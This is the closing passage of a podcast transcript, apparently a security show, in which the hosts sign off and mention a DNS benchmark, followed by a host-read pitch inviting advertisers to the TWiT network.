[02:45:25] Yeah. Yeah. It has been for months. Yep. The DNS benchmark is now available. Wonderful. Wonderful. Steve, thank you so much for another great episode. If I'm forgetting anything, now's your time to tell us. You got it. You got it. Wonderful. Wonderful. Thanks for doing a great job at your end. Thank you. Yeah. It's always a pleasure to get to join you on the show. Leo will be back next week, everyone. Don't worry. But thank you for having me. He does have some travel planned for later this year.

[02:45:55] So we're going to be seeing more of you. Yes, indeed. And I'll be right here ready for it. All right. I think that does it for this week. So goodbye, Steve. And goodbye, listeners. Goodbye. Thanks, buddy. Bye. Thank you very much. Hey, I'm Mikah Sargent, host of Tech News Weekly and several other shows on the network. If you're looking for a smarter way to advertise in 2026, look no further.

[02:46:21] Because Twit is where tech decision makers listen and ROI never ends. Our audience isn't just passionate about technology either. They actually work in it. Over 90% of our listeners are IT professionals, developers, engineers, and business leaders who shape the products and the decisions that move tech forward at their companies. Here at Twit, we produce an array of trusted tech shows.

[02:46:46] These include the latest news and hands-on advice featuring authentic, embedded, host-read ads delivered by Leo Laporte and yours truly. Now, our partners see real results because our listeners actually trust us and then take action. And that's because of authenticity. When I'm talking about how I like a product or a service, it's because I actually do. And our listeners know that. And here's something we're super proud of.

[02:47:12] 88% of our listeners say they've made a purchase because of a Twit ad. So if you're ready to reach the most intelligent audience in tech with that purchasing power to back it up, let's talk. We'd love to help your brand grow. Email partner at twit.tv or visit twit.tv slash advertise.
